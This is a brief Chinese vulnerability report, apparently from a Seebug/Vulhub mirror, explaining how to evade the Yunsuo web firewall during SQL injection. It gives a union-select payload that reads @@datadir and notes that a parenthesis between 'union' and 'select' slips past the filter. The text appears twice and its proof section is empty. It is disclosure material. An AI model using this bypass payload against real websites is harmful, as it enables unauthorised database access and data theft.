VULHUB ™

### 简要描述： 绕过云锁进行SQL注入 ### 详细说明： EXP： 1.php?id=-1 union(select 1,2,3,@@datadir,5,6,7,8,9,10,11,12,13,14,15,16,17) 在union和select中间加个(就绕过了。 看图： [<img src="https://images.seebug.org/upload/201505/0816300390a42f7d48247e7a289cbbb0c249a7c6.png" alt="d1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/0816300390a42f7d48247e7a289cbbb0c249a7c6.png) 成功注射出数据了。 ### 漏洞证明：

### 简要描述： 绕过云锁进行SQL注入 ### 详细说明： EXP： 1.php?id=-1 union(select 1,2,3,@@datadir,5,6,7,8,9,10,11,12,13,14,15,16,17) 在union和select中间加个(就绕过了。 看图： [<img src="https://images.seebug.org/upload/201505/0816300390a42f7d48247e7a289cbbb0c249a7c6.png" alt="d1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/0816300390a42f7d48247e7a289cbbb0c249a7c6.png) 成功注射出数据了。 ### 漏洞证明：